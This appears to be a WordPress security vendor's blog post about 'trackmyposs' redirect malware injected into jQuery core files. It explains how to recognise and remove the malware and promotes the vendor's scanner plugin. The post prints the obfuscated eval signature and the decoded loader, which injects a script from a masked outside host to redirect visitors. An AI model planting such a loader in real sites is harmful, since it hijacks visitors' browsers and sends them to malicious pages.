Recently there has been an increase in the embedding of JAVASCRIPT-type malware starting with trackmyposs in WordPress core files.

What is the redirect hack in WordPress?

A redirect hack is a type of malware (malicious program) in which a hacker modifies some files in WordPress to force users to visit a different site.

The hacker takes advantage of a vulnerability in a program, such as a plugin, or by taking advantage of administrative privileges to rewrite a site’s files and embed these malware programs.

Embedding JAVASCRIPT-type malware starting with trackmyposs in core files

This malware inserts malicious code into the top of the following files included in WordPress.

/wp-includes/js/jquery/jquery.min.js
/wp-includes/js/jquery/jquery-migrate.min.js
Or JAVASCRIPT with the same file name above included in the theme or plugin

The incorrect code looks like the following

/*trackmyposs*/eval(String.fromCharCode( followed by a number

This code takes the program obfuscated by String.fromCharCode back to the original executable code and executes it with the eval function.

jquery.min.js and jquery-migrate.min.js may be loaded on all pages of a WordPress site, and when users access various pages of the site, they are executed and forced to go to another site.

Unobfuscated, the code will look like the following.

var d=document;var s=d.createElement('script'); s.id="trackmyposs";
s.src=https://********/robots.js?v=3.1.3; 
if (document.currentScript) { 
    document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
    d.getElementsByTagName('head') [0].appendChild(s); }
}

The ******** part contains the distribution source of the illegal file.

You can see that this code creates an embedded element of JAVASCRIPT and embeds the code for the malicious redirect hack pulled from the outside into the HEAD of the site to execute it.

Malware Detection and Removal

Free WordPress:Malware Scan & Security Plug-in [Malware and Virus Detection and Removal] will dry up and remove trackmyposs malware.

In addition, the fact that this malware is embedded means that there may be other backdoors embedded in the server because the hacker has taken administrative privileges or some other vulnerability.

It may be necessary to inspect all files on the server and remove the malware.

Related Posts:

  1. Redirect hack that sends you to a malicious site when you click on a screen or link on a WordPress site.
    This section describes a type of malware that is spreading to a large number of files on a very large number of sites these days, in which clicking on various elements of a site sends the user to a different malicious site....
  2. Tampering Cases in WordPress What are SEO Hacks?
    The most common type of WordPress tampering today is called SEO hacks (SEO spam), and we will explain examples of SEO hacks and how to deal with them....
  3. 10 files in which malformed JAVASCRIPT code is embedded when WordPress is tampered with.
    This section describes a file in which redirect hack code is often embedded, which causes a WordPress-created site to jump to another site when accessed (redirect)....
  4. Five types of malware embedded in WordPress
    Here are some of the types of malware embedded in WordPress that are common these days. If similar code is included in the site’s program, we suspect that WordPress has been hacked and tampered with....
  5. What is a WordPress injection attack?
    There are various methods by which WordPress can be hacked, the most common of which is called an injection attack. This section describes these injection attacks....
  6. What to do if a large amount of malware (malformed JAVASCRIPT) is embedded in a WordPress post
    If you have been infected with a type of WordPress malware that embeds malformed JAVASCRIPT code (which causes malformed redirects and other behavior) in a large number of posts, we will explain how to remove this code....